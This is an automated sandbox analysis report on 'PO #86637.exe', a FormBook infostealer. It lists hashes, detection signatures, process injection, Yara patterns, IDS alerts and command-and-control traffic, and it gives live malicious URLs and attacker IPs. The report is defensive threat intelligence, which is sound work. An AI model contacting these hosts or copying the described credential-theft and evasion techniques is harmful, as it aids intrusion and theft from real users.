Edit tour

Windows Analysis Report
PO #86637.exe

Overview

General Information

Sample name:	PO #86637.exe
Analysis ID:	1504651
MD5:	d14ac19303ac82dd9370e6e3277ef1c6
SHA1:	6217e9a7218cfbbe315aa8d631558f5febb3139b
SHA256:	ac32edc4349871fa356f2bd55ce445b89f20b25f6792596fcf134cba4163585e
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches the installation path of Mozilla Firefox

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Yara signature match

Classification

Process Tree

System is w7x64

PO #86637.exe (PID: 3612 cmdline: "C:\Users\user\Desktop\PO #86637.exe" MD5: D14AC19303AC82DD9370E6E3277EF1C6)

svchost.exe (PID: 3656 cmdline: "C:\Users\user\Desktop\PO #86637.exe" MD5: 54A47F6B5E09A77E61649109C6A08866)

fhSlYsGoxBSrK.exe (PID: 3016 cmdline: "C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

netbtugc.exe (PID: 3728 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: 895962CB2049447EFD2DBE61DEDE596A)

fhSlYsGoxBSrK.exe (PID: 1036 cmdline: "C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 3952 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.394506656.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.394506656.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ed63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16f92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.477446338.0000000000080000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.477446338.0000000000080000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x39c7a:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x21ea9:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.753541101.0000000001E90000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.753541101.0000000001E90000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x313ec:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1961b:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.753341793.0000000000240000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.753341793.0000000000240000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.394472558.0000000000160000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.394472558.0000000000160000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.753316396.0000000000130000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.753316396.0000000000130000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.753330363.00000000001F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.753330363.00000000001F0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.753525101.0000000004720000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.753525101.0000000004720000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x781930:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x769b5f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.395236048.0000000002B20000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.395236048.0000000002B20000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x781930:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x769b5f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 13 entries

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PO #86637.exe", CommandLine: "C:\Users\user\Desktop\PO #86637.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO #86637.exe", ParentImage: C:\Users\user\Desktop\PO #86637.exe, ParentProcessId: 3612, ParentProcessName: PO #86637.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO #86637.exe", ProcessId: 3656, ProcessName: svchost.exe

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\netbtugc.exe, ProcessId: 3728, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\PO #86637.exe", CommandLine: "C:\Users\user\Desktop\PO #86637.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO #86637.exe", ParentImage: C:\Users\user\Desktop\PO #86637.exe, ParentProcessId: 3612, ParentProcessName: PO #86637.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO #86637.exe", ProcessId: 3656, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-05T09:05:27.891869+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.22	49161	148.72.152.174	80	TCP
2024-09-05T09:05:48.527465+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.22	49167	3.33.130.190	80	TCP
2024-09-05T09:05:59.459154+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.22	49170	172.191.244.62	80	TCP
2024-09-05T09:06:11.202499+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.22	49173	172.96.191.39	80	TCP
2024-09-05T09:06:22.024820+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.22	49176	217.70.184.50	80	TCP
2024-09-05T09:06:32.878403+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.22	49179	63.250.47.40	80	TCP
2024-09-05T09:06:43.664334+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.22	49182	91.184.0.200	80	TCP
2024-09-05T09:06:54.315526+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.22	49185	13.248.169.48	80	TCP
2024-09-05T09:07:16.545704+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.22	49191	43.242.202.169	80	TCP
2024-09-05T09:07:33.552398+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.22	49194	103.224.182.242	80	TCP
2024-09-05T09:07:44.480897+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.22	49197	85.159.66.93	80	TCP
2024-09-05T09:07:56.091735+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.22	49200	188.114.96.3	80	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-05T09:05:27.891869+0200	2855465	1	A Network Trojan was detected	192.168.2.22	49161	148.72.152.174	80	TCP
2024-09-05T09:05:48.527465+0200	2855465	1	A Network Trojan was detected	192.168.2.22	49167	3.33.130.190	80	TCP
2024-09-05T09:05:59.459154+0200	2855465	1	A Network Trojan was detected	192.168.2.22	49170	172.191.244.62	80	TCP
2024-09-05T09:06:11.202499+0200	2855465	1	A Network Trojan was detected	192.168.2.22	49173	172.96.191.39	80	TCP
2024-09-05T09:06:22.024820+0200	2855465	1	A Network Trojan was detected	192.168.2.22	49176	217.70.184.50	80	TCP
2024-09-05T09:06:32.878403+0200	2855465	1	A Network Trojan was detected	192.168.2.22	49179	63.250.47.40	80	TCP
2024-09-05T09:06:43.664334+0200	2855465	1	A Network Trojan was detected	192.168.2.22	49182	91.184.0.200	80	TCP
2024-09-05T09:06:54.315526+0200	2855465	1	A Network Trojan was detected	192.168.2.22	49185	13.248.169.48	80	TCP
2024-09-05T09:07:16.545704+0200	2855465	1	A Network Trojan was detected	192.168.2.22	49191	43.242.202.169	80	TCP
2024-09-05T09:07:33.552398+0200	2855465	1	A Network Trojan was detected	192.168.2.22	49194	103.224.182.242	80	TCP
2024-09-05T09:07:44.480897+0200	2855465	1	A Network Trojan was detected	192.168.2.22	49197	85.159.66.93	80	TCP
2024-09-05T09:07:56.091735+0200	2855465	1	A Network Trojan was detected	192.168.2.22	49200	188.114.96.3	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-05T09:05:42.987458+0200	2855464	1	A Network Trojan was detected	192.168.2.22	49165	3.33.130.190	80	TCP
2024-09-05T09:05:45.537570+0200	2855464	1	A Network Trojan was detected	192.168.2.22	49166	3.33.130.190	80	TCP
2024-09-05T09:05:53.892004+0200	2855464	1	A Network Trojan was detected	192.168.2.22	49168	172.191.244.62	80	TCP
2024-09-05T09:05:56.458808+0200	2855464	1	A Network Trojan was detected	192.168.2.22	49169	172.191.244.62	80	TCP
2024-09-05T09:06:04.534266+0200	2855464	1	A Network Trojan was detected	192.168.2.22	49171	172.96.191.39	80	TCP
2024-09-05T09:06:07.089987+0200	2855464	1	A Network Trojan was detected	192.168.2.22	49172	172.96.191.39	80	TCP
2024-09-05T09:06:16.346526+0200	2855464	1	A Network Trojan was detected	192.168.2.22	49174	217.70.184.50	80	TCP
2024-09-05T09:06:18.890592+0200	2855464	1	A Network Trojan was detected	192.168.2.22	49175	217.70.184.50	80	TCP
2024-09-05T09:06:27.227650+0200	2855464	1	A Network Trojan was detected	192.168.2.22	49177	63.250.47.40	80	TCP
2024-09-05T09:06:29.765024+0200	2855464	1	A Network Trojan was detected	192.168.2.22	49178	63.250.47.40	80	TCP
2024-09-05T09:06:37.968544+0200	2855464	1	A Network Trojan was detected	192.168.2.22	49180	91.184.0.200	80	TCP
2024-09-05T09:06:40.509786+0200	2855464	1	A Network Trojan was detected	192.168.2.22	49181	91.184.0.200	80	TCP
2024-09-05T09:06:48.756890+0200	2855464	1	A Network Trojan was detected	192.168.2.22	49183	13.248.169.48	80	TCP
2024-09-05T09:06:51.306706+0200	2855464	1	A Network Trojan was detected	192.168.2.22	49184	13.248.169.48	80	TCP
2024-09-05T09:07:10.603208+0200	2855464	1	A Network Trojan was detected	192.168.2.22	49189	43.242.202.169	80	TCP
2024-09-05T09:07:13.148035+0200	2855464	1	A Network Trojan was detected	192.168.2.22	49190	43.242.202.169	80	TCP
2024-09-05T09:07:27.812750+0200	2855464	1	A Network Trojan was detected	192.168.2.22	49192	103.224.182.242	80	TCP
2024-09-05T09:07:30.359586+0200	2855464	1	A Network Trojan was detected	192.168.2.22	49193	103.224.182.242	80	TCP
2024-09-05T09:07:38.722588+0200	2855464	1	A Network Trojan was detected	192.168.2.22	49195	85.159.66.93	80	TCP
2024-09-05T09:07:41.276315+0200	2855464	1	A Network Trojan was detected	192.168.2.22	49196	85.159.66.93	80	TCP
2024-09-05T09:07:49.807611+0200	2855464	1	A Network Trojan was detected	192.168.2.22	49198	188.114.96.3	80	TCP
2024-09-05T09:07:52.584880+0200	2855464	1	A Network Trojan was detected	192.168.2.22	49199	188.114.96.3	80	TCP

Joe Sandbox Signatures

• AV Detection
• Compliance
• Networking
• E-Banking Fraud
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection
• Stealing of Sensitive Information
• Remote Access Functionality

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.omexai.info/7xi5/?A8_pSPdX=ixI46zwDNWOoK0d6d9oZupQDSeTrSlA+qsFL+v4hzxqFGT4p3+8W5ZPgGBQ8bVBflzmq/wZaho2FRO9YF6xYKTPjOQanpFHctYNa2gQELNdW5L2bG4NjRgFmI2Bw&38R0=jHY4nFvHAVc8	Avira URL Cloud: Label: malware
Source: https://www.elsupertodo.net/2jit/?A8_pSPdX=iS4P4oRSl8BXKzGHILRVAF4LAAl1IYK6JXAZlPSQukWhX6ryYmutxv	Avira URL Cloud: Label: malware
Source: http://www.omexai.info/7xi5/	Avira URL Cloud: Label: malware
Source: http://www.elsupertodo.net/2jit/?A8_pSPdX=iS4P4oRSl8BXKzGHILRVAF4LAAl1IYK6JXAZlPSQukWhX6ryYmutxv+d9ucM3CL7kJipDUdSquhSox7e6HgmYI08bz3IIKp3NcTDvEuGYqTKDQ0c7nXfRnBNa46x&38R0=jHY4nFvHAVc8	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://www.omexai.info/7xi5/

Virustotal: Detection: 7%

Perma Link

Multi AV Scanner detection for submitted file

Source: PO #86637.exe	ReversingLabs: Detection: 39%
Source: PO #86637.exe	Virustotal: Detection: 29%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 00000002.00000002.394506656.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.477446338.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.753541101.0000000001E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.753341793.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.394472558.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.753316396.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.753330363.00000000001F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.753525101.0000000004720000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.395236048.0000000002B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: PO #86637.exe

Joe Sandbox ML: detected

Source: PO #86637.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fhSlYsGoxBSrK.exe, 00000003.00000000.375903357.000000000036E000.00000002.00000001.01000000.00000004.sdmp, fhSlYsGoxBSrK.exe, 00000005.00000000.408609838.000000000036E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdb source: PO #86637.exe, 00000000.00000003.352454555.0000000002DD0000.00000004.00001000.00020000.00000000.sdmp, PO #86637.exe, 00000000.00000003.352557535.0000000002F30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.373172242.0000000000280000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.373908133.0000000000460000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.394555757.0000000000BA0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.394555757.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.753552553.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.394436755.0000000000520000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.753552553.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.394786162.0000000000730000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.394520672.00000000008D4000.00000004.00000020.00020000.00000000.sdmp, fhSlYsGoxBSrK.exe, 00000003.00000002.753396697.0000000000614000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.753387034.000000000044A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.753781292.00000000011FC000.00000004.10000000.00040000.00000000.sdmp, fhSlYsGoxBSrK.exe, 00000005.00000000.409175143.0000000002BDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.477475123.00000000006AC000.00000004.80000000.00040000.00000000.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49161 -> 148.72.152.174:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49161 -> 148.72.152.174:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49167 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49167 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49174 -> 217.70.184.50:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49180 -> 91.184.0.200:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49166 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49171 -> 172.96.191.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49172 -> 172.96.191.39:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49176 -> 217.70.184.50:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49175 -> 217.70.184.50:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49173 -> 172.96.191.39:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49173 -> 172.96.191.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49196 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49189 -> 43.242.202.169:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49176 -> 217.70.184.50:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49165 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49199 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49179 -> 63.250.47.40:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49198 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49170 -> 172.191.244.62:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49181 -> 91.184.0.200:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49190 -> 43.242.202.169:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49170 -> 172.191.244.62:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49168 -> 172.191.244.62:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49200 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49179 -> 63.250.47.40:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49200 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49191 -> 43.242.202.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49178 -> 63.250.47.40:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49183 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49197 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49191 -> 43.242.202.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49192 -> 103.224.182.242:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49177 -> 63.250.47.40:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49182 -> 91.184.0.200:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49184 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49182 -> 91.184.0.200:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49197 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49193 -> 103.224.182.242:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49185 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49185 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49169 -> 172.191.244.62:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49194 -> 103.224.182.242:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49194 -> 103.224.182.242:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49195 -> 85.159.66.93:80

Source: Joe Sandbox View	IP Address: 45.33.6.223 45.33.6.223
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
